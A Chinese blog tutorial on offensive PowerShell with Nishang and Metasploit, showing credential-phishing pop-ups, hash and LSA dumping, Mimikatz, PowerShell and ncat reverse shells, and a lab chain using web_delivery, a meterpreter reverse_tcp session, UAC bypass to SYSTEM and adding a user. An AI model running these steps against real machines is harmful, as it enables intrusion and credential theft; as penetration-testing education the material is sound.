当前位置:首页 > 未分类 > 正文内容

(原创)Powershell And Metasploit (上)

admin2天前未分类7

00x01 #题外话

  • 作者: 墨 (X_Al3r)

  • 一篇不知道该用什么名字的文章!

00x02 #什么是 Powershell

PowerShell 一般指 Windows Power Shell

Powershell 是 Microsoft Windows 命令行 shell 程序和脚本环境,它提供了令人难以置信的活性和功能来管理 Windows 系统,现在 Windows 系统上基本上都有它的存在。正因为它的强大,才能被我们所利用,帮助我们进行渗透测试。

Powershell 的各系统版本

  1. Windows 2008 R2 - Version 2

  1. Windows 2012 - Version 3

  1. Windows 2012 R2 - Version 4

  1. Windows 2016 - Version 5

#Poswershell 的优秀之处

  1. 代码运行在内存中可以不去接触磁盘

  1. 从另一个系统中下载代码并执行

  1. 很多安全产品并不能监测到 powershell 的活动

  1. cmd.exe 通常被阻止运行,但是 powershell 不会。

00x03 #所需要准备的东西

  1. Nishanghttps://github.com/samratashok/nishang (本文主要工具,其他不做使用介绍)、

用于逆向工程的 PowerShell 模块,可进行反汇编托管以及非托管的代码、进行.NET 恶意软件分析、分析内存、解析文件格式和内存结构、获得内部系统信息等。

  1. LinuxKaLi: https://www.kali.org

#导入 Nishang 脚本

  1. 启用 Powershell

Win+R 启动 Powershell

img

  1. 加载 Nishang 脚本

命令:Import-Module .\nishang.psm1

img

记住,要加上.\否则会报错例如这样

img

00x04 模块介绍

#信息搜集

  1. Check-VM:它是用于检测当前的机器是否是一台已知的虚拟机的。它通过检测已知的一些虚拟机的指纹信息 (如:HVMWare,Virtual Box,) 来识别。

img

  1. Invoke-CredentialsPhish:这个脚本是用来欺骗用户输入账号密码信息的

img

他会一直持续到你输入正确为止 (无法关闭) 直到用户输入正确后这个框才会消失,然后我们就可以得到明文的管理员账号密码

img

    • Useradmin:admin

    • PassWord:qwe123!@#

  1. FireBuster FireListener:可以对内网进行扫描,它会把包发给 FireListener

img

脚本作者的 Github 上面还提供了一个 Python 版的监听端:

https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/

  1. Get-Information:这个脚本可以获取目标机器上大量的信息 (FTP 访问,进程,计算机配置信息,无线网络和设备的信息,Hosts 信息等等非超丰富)。

img

img

img

还有许多,反正就是很丰富当然,如果你这样看不习惯,也可以使用 Out-File 来将运行结果保存到指定文件:

Get-Information | Out-File D:\1.txt

  1. Get-LSASecret:该脚本可以获取 LSA 信息,但是使用的前提当然是你已经成功提升了权限的情况下。

因为执行这个脚本需要 32 位的 powershell(我的为 64)就不做演示了

img

  1. Get-PassHashes:这个脚本在 Administrator 的权限下,可以读出密码哈希值

img

可以使用-PSObjectFormat来格式化输出结果

img

  1. Get-WLAN-Keys:在 Administrator 的权限下,可以利用这个脚本来 dump 出 WLAN 文件的密钥信息

没有装 wlan 所以没有信息

  1. Invoke-MimikatzWdigestDowngrade:Dump 出 Windows 8.1 and Server 2012 的系统用户密码。

相信看到 Mimikatz 也就知道了,执行了 Windows 会锁屏

img

  1. Get-PassHints:从一个目标得到 Windows 用户的密码提示,没有密码提示,就不演示了

以上内容从安全课一篇文章中介绍,因为内容有点像,就引用了对脚本的介绍

喜欢提权的小伙伴,干货来了~~~

#反弹 shell

  1. Invoke-PowerShellTcp:互交式 Powershell 反向 TCP 连接

首先我在 Kali (标题带有 kali 怎么能不启用 kali 呢) 上启用启用一个监听

img

然后开始在 Powershell 上使用 Invoke-PowerShellTcp 反弹一个 shell 过去

img

img

同样,windows 也可以挂载一个监听使用 powercat 即可

Powercat 项目地址:https://github.com/besimorhino/powercat

img

同样在 Powershell 上使用 Invoke-PowerShellTcp 反弹一个 shell 过去

同样,毫无例外

img

  1. Invoke-PowerShellUdp:互交式 Powershell 反向 udp 连接

同样我先在 Kali 上启用启用一个监听不过这次用的 ncat

img

img

  1. powercat:这款工具的强大我相信也不用我多说了吧,他被称之为 PowerShell 的 netcat 之前也有说,我就不细细介绍了

当然,反弹 shell 不止这么点,还有许多,我就不一一介绍了接下来开始进行一个实例操作吧~~~

00x04 实战操作 Powershell 与 Metasploit

1. win10_BypassUAC (win10 提权)

    1. 攻击者 ip192.168.1.103

    1. 攻击者系统:Linux Kali

    1. 被攻击者 ip192.168.1.100

    1. 被攻击者系统:Win10

2. 攻击流程

  1. 使用 Metasploit 中的 web_delivery 模块生成一个 Powershell 脚本

  1. 被攻击者系统执行 Posershell 脚本

  1. msf 接收一个会话

  1. 使用 bypassuac 模块提升权限

3. 攻击开始

  1. 加载 web_delivery 模块

use exploit/multi/script/web_delivery

Show options查看所需要设置的信息

img

img

然后我在物理机上执行下 Metasploit 给我的 Powershell 执行代码

img

img

Metasploit 反弹得到一个 meterpreter 会话

img

img

    • 设置 target 为 2:set target 2

    • 加载一个 Payload:set payload windows/meterpreter/reverse_tcp

    • 设置 LHOST

    • 设置 LPORT

    • 开始攻击:Exploit

  1. 加载 BypassUac 模块

use exploit/windows/local/bypassuac_eventvwr

Show options查看所需配置

img

当然你需要换一下你的端口,否则会冲突

反弹得到一个会话

img

得到 system 权限

img

使用 shell 命令进入 cmd 添加用户

img

已经添加成功,如果直接添加是不可以的

img

    • 设置 session:set session(设置你刚刚获得的 meterpreter 会话)

    • 开始攻击:Exploit

结尾

Powershell And Metasploit (上) 结束

下会后续发布~~如果文字教学不懂的话可以跟我说一下,我尝试做一套教程~

UAC 提权 (来自我们 demon 表哥的视频):

http://oc78wb8cz.bkt.clouddn.com/win10_bypassUAC.mp4

本文搜集许多资料做的小结,有如雷同,请勿责怪~


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=36

分享给朋友:

“(原创)Powershell And Metasploit (上)” 的相关文章

(整理)看我如何查到是谁发给我的坦白说 [怎么看谁给我发的坦白说]

(整理)看我如何查到是谁发给我的坦白说 [怎么看谁给我发的坦白说]

(整理)看我如何查到是谁发给我的坦白说 [怎么看谁给我发的坦白说] 引言: 腾讯最近出来的坦白说有点像之前的悄悄话。 就是好友可以选择标签“匿名”给你发送,然后可以进行“匿名”聊天。 然后,并不“匿名”,从朋友圈里面两位大佬那里搜集和自己发现的方法整理如下。 方法一:(自己偶...

(原创)看我用各种姿势在手机和PC查看到连接到的wifi密码

(原创)看我用各种姿势在手机和PC查看到连接到的wifi密码

今天一个女神来我家做客,她问我WiFi密码,然而我却奇迹般的忘记了(特么的当时心里一万个草泥马踏过去),让我在她面前尴尬求子的,所以为了防止你们也出现这种情况,我特地把各种方法整理了一下,那么感兴趣的朋友们继续往下看吧! 用电脑的cmd命令行查看密码 1.按住Windows键和R键,在跳出来的运...

(原创) 校园卡破解系列之内网渗透提权校园卡服务器 [内网渗透][服务器提权][渗透内网]

(原创) 校园卡破解系列之内网渗透提权校园卡服务器 [内网渗透][服务器提权][渗透内网]

一、渗透背景与环境准备1. 时间与环境渗透时间:上午大课间(仅十几分钟完成)操作设备:班级 XP 系统电脑(性能有限,需选择轻量工具)内网 IP:本地 IP 为172.18.33.38,扫描网段定为172.18.32.0-172.18.33.02. 工具选择优先工具:Kali 的 MSF 模块(可直...

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

(原创)求人不如求己 -- 剪辑音乐就是这么简单 [如何剪辑音乐]

每每到了学校有活动,需要播放歌曲时,QQ 就多几个好友,消息又 99+,不消问什么事情,就知道是找我剪辑歌曲的同学了。怎么说,我这人对别人提出的需求,都尽力去帮助的,在剪辑音乐这事情上,从没拒绝过,但年复一年,每次剪辑音乐其实很简单,但是量多,就比较影响自己时间了,我又不会拒绝别人,很是尴尬,所以...

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(原创) 校园卡破解系列之数据修改 [pm3 破解饭卡][pm3 修改数据][校园卡修改][IC 卡修改数据]

(二)吃不完的饭卡提升完 IC 卡权限,就该考虑能不能修改饭卡金额了。通过两次消费前后饭卡数据的对比分析,发现虽然卡片数据包含较多扇区和区块,但消费前后变化的地方仅涉及两个扇区,这为后续分析提供了便利。通过十六进制与十进制转换,可进一步拆解变化的数据:消费后金额:373.2(数字:37320;16...

(原创)IBM 服务器安装 windows sever 2008 R2 教程

(原创)IBM 服务器安装 windows sever 2008 R2 教程

首先讲一下我们需要的工具:两个大于 4G 的 U 盘,一个用来刻录 IBM 的官方引导镜像,一个用来刻录 2008 系统的镜像软件方面:需要一个软碟通(UItralISO) 软件,百度上资源较多,随便下载一个即可软件的图标做参考,实际打开界面如图:打开软件后插入 U 盘,在软件右上角选择「文件 --...